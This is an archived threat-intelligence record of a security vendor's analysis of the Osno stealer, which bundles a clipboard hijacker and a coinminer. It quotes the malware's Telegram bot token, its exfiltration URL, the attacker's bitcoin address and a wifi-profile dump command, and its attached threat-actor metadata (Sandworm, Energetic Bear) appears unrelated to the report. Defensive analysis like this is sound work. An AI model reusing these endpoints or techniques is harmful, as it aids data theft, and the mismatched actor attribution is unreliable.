{
	"id": "ecc84c12-7348-4ead-9195-f47ec0324837",
	"created_at": "2026-04-06T00:21:05.62599Z",
	"updated_at": "2026-04-10T13:12:45.785755Z",
	"deleted_at": null,
	"sha1_hash": "73731d6c0880b4139b2396c125e9a1607a1f2e36",
	"title": "Osno – A Stealer and a Miner in One",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 566108,
	"plain_text": "Osno – A Stealer and a Miner in One\r\nPublished: 2021-01-28 · Archived: 2026-04-05 14:53:38 UTC\r\nIn the earlier days, threat actors used to create malware for a specific job, for instance ransomware. These days, however, threat actors have started creating versatile malware. In this blog we explain one such malware, Osno, which is both a stealer and a miner.\r\nOsno Recovery Tool/Stealer steals browser data and wallet details, captures a screenshot of the system and grabs details of installed programs. Earlier this year, when downloaded, the Osno stealer installed both a rootkit and its ransomware on the victim’s system. Here we will get into the nuances of an archive file “Steam_Machine_Checker.rar”, which can be downloaded from the site hxxps[:]//www[.]upload[.]ee/files/12701875/Steam_Machine_Checker[.]rar[.]html and comes bundled with the Osno stealer, a BTC Clipboard Hijacker and a coinminer.\r\nFigure 1: Malware Download\r\nSteam is a digital store for purchasing, downloading and playing video games. “Steam Machine Brute Force Checker” is a hacktool for brute forcing passwords for Steam Engine. The author tries to lure illegal game users into downloading this tool bundled with malware.\r\nAfter execution of Steam_Machine_Checker.exe, it opens the GUI screen of “Steam Machine Brute Force Checker” in the frontend and starts its malicious activity in the backend.\r\nhttps://labs.k7computing.com/?p=21562\r\nPage 1 of 10\r\nFigure 2: SteamBruteForce\u0026Checker GUI\r\nFigure 3: Process Flow\r\nSteamMachine.exe executes service.exe and then SteamMachineService.exe, which are not malicious by themselves.\r\nFigure 4: Files found in SteamMachine/config Folder\r\nPersistence\r\nUpdate.exe creates a Run entry for persistence in the “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” registry location, pointing to the file “%AppData%\\Roaming\\scvhost\\scvhostservice.exe“. Scvhostservice.exe initiates svchost.exe, which in turn does coin mining.\r\nFigure 5: Autostart Entry for Malware\r\nClipboard Hijacker\r\nCtfmom.exe and _CL_02f3a8c9sy are dropped in “%Appdata%/Roaming/Microsoft” by config.exe. _CL_02f3a8c9sy contains base64 encoded data.\r\nFigure 6: ctfmom.exe – Clipboard Hijacker\r\nIt gets the current clipboard contents using Clipboard.GetText(). If the hash (i.e. the BTC address) in currentClipboard starts with ‘1’, it replaces it with 1LrPUuoopchKbfkJYLEwk2YWqBh6ZakTxX using Clipboard.SetText().\r\nClipboard.GetText – Retrieves text data from the Clipboard.\r\nClipboard.SetText – Clears the Clipboard and then adds text data to it.\r\nA common user may not notice any change while pasting the address for a BTC transaction, so the hackers succeed in receiving the bitcoins from such transactions (a wrong transaction from the user’s point of view).\r\nFigure 7: Code containing Clipboard Hijacker\r\nFigure 8: Code containing Malware Author’s BTC Address\r\nThis BTC address has been actively receiving Bitcoins through clipboard abuse. Some users have reported the replacement of their hash with the malware author’s hash on the same site.\r\nFigure 9: Bitcoin Transaction for 1LrPUuoopchKbfkJYLEwk2YWqBh6ZakTxX\r\nOsno Stealer\r\nConfigs.exe starts MsBuild.exe for stealer activity. MSBuild.exe steals bookmarks (to find the victim’s preferred sites, which could be internet banking or bitcoin transaction sites), wallets, the list of running processes (using tasklist.exe), and the hardware and software installed (Anti-Virus, firewall etc.), which is kept in the temp folder under MD5(username)/MD5(machinename).\r\nThe command ‘\"cmd.exe\" /C chcp 65001 \u0026\u0026 netsh wlan show profile | findstr All’ is used to switch the console to UTF-8 and list the Wireless AutoConfig Service profiles. The list of Bitcoin wallets searched for is: Zcash, Armory, Bytecoin, Ethereum, Exodus, Electrum, Coinomi, Guarda, Atomic, Litecoin, Dash, Bitcoin.\r\nIt also downloads CommandCam.exe from hxxp[:]//raw[.]githubusercontent[.]com/tedburke/CommandCam/master/CommandCam[.]exe for capturing screenshots of the system. The screenshot is saved as screen.jpg.\r\nFigure 10: Stealer Data in Temp Folder\r\nSignature.txt, created by MSBuild.exe and found in the temp directory, has the string “Osno Recovery Tool version 2.1.5”.\r\nFigure 11: Contents in Signature.txt\r\nHardware \u0026 Soft.txt, also created by MSBuild.exe, has the string “OsnoStealer WifiFucker v2” and other details like Firewall, Anti-Virus, Timezone, Country and HWID.\r\nFigure 12: Contents in Hardware \u0026 Soft.txt\r\nMSBuild.exe also gets a list of all the files present in each directory. It is then stored in the subfolder ‘Dirs’ as Desktop.txt, Documents.txt, Downloads.txt, OneDrive.txt, Pictures.txt, Startup.txt, Temp.txt and Videos.txt.\r\nFigure 13: Stealer data in Directory Structure\r\nIt then sends the stolen data in temp via Telegram using the ‘sendDocument’ method of the Telegram Bot API. This method is used to send general files.\r\nsendDocument(chat_id, document)\r\nUse this method to send general files. On success, the sent message is returned. Bots can currently send files of any type of up to 50 MB in size; this limit may be changed in the future.\r\nParameter | Type | Required | Description\r\nchat_id | Integer or String | Yes | Unique identifier for the target chat or username of the target channel (in the format @channelusername)\r\ndocument | InputFile or String | Yes | File to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files\r\nBotid: 1357457986:AAERrY18oy4DDObaDW6NeWL5QjSOphXAuyA\r\nChat_id: 1171937559\r\nhxxp[:]//api[.]telegram[.]org/bot1357457986:AAERrY18oy4DDObaDW6NeWL5QjSOphXAuyA/sendDocument?chat_id=1171937559\u0026caption=☠️ Brought you by Osno 2.1.5 ☠️\r\nFigure 14: Malicious Network Activity Captured\r\nThe malware process path is stored base64 encoded in %Temp%/gpustats.bx.\r\nFigure 15: gpustats.bx found in temp\r\nCoinminer\r\nAlong with the stealer and BTC Clipboard Hijacking, it also does coin mining. The files seen in Figure 16 are dropped by update.exe, which is responsible for coin mining.\r\nFigure 16: Coinminer dropped in Roaming\\scvhost\r\nThe coinminer programs, namely DiabloMiner, found in the Cursor Library (.cl) files are from open source code. The other Cursor Libraries are derived from the poclbm project.\r\nControl Logic | Open Source Code | Author\r\ndiablo130302.cl DiabloMiner Con Kolivas, Patrick McFarland\r\ndiakgcn121016.cl poclbm project\r\nphatk kernel Phateus\r\nDiabloMiner kernel DiabloD3\r\nphatk121016.cl poclbm project Con Kolivas\r\npoclbm130302.cl poclbm project Con Kolivas\r\nscrypt130511.cl Con Kolivas\r\nSvchost.exe dropped in AppData\\Roaming\\scvhost does the coinminer activity. Svchost.exe is a legitimate coinmining file given malicious parameters by the threat actors to do their illegal work.\r\nFigure 17: Fake svchost.exe contacting litecoinpool\r\nLitecoin, as shown in Figure 17, is a purportedly technical improvement of Bitcoin that is capable of faster turnarounds via its Scrypt mining algorithm (Bitcoin uses SHA-256). The Litecoin Network is able to produce 84 million Litecoins—four times as many cryptocurrency units as issued by Bitcoin.\r\nmining.subscribe(“user agent/version”, “extranonce1”)\r\nmining.authorize(“username”, “password”)\r\nFigure 18: Coinmining Packet\r\nOsno stealer not only keeps evolving its techniques and code to stay undetected but also comes bundled with a coinminer and a BTC Clipboard Hijacker for the malware author’s direct monetary benefit. Users are advised not to download and install hacking tool software from untrusted sites, which might actually be a trap laid out for them. It is also recommended to double check the hash (address) while doing a BTC transaction. We at K7 detect all such malicious files. Users are advised to install a reputable security product like “K7 Total Security” and keep it updated to stay safe from the latest threats.\r\nIndicators Of Compromise (IOCs)\r\nMD5 | File Name | K7 Detection Name\r\n12CB317972BD329289FBC8B7CD289E67 | configs.exe | Trojan ( 005756931 )\r\n29516F4747ABB49E2085B64376A89F2E | update.exe | Trojan ( 005756931 )\r\n998D4888B99734C60802F93FB2DAF940 | ctfmom.exe | Trojan ( 00558e791 )\r\n29516F4747ABB49E2085B64376A89F2E | scvhostservice.exe | Trojan ( 005756931 )\r\nSource: https://labs.k7computing.com/?p=21562",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://labs.k7computing.com/?p=21562"
	],
	"report_names": [
		"?p=21562"
	],
	"threat_actors": [
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434865,
	"ts_updated_at": 1775826765,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/73731d6c0880b4139b2396c125e9a1607a1f2e36.pdf",
		"text": "https://archive.orkl.eu/73731d6c0880b4139b2396c125e9a1607a1f2e36.txt",
		"img": "https://archive.orkl.eu/73731d6c0880b4139b2396c125e9a1607a1f2e36.jpg"
	}
}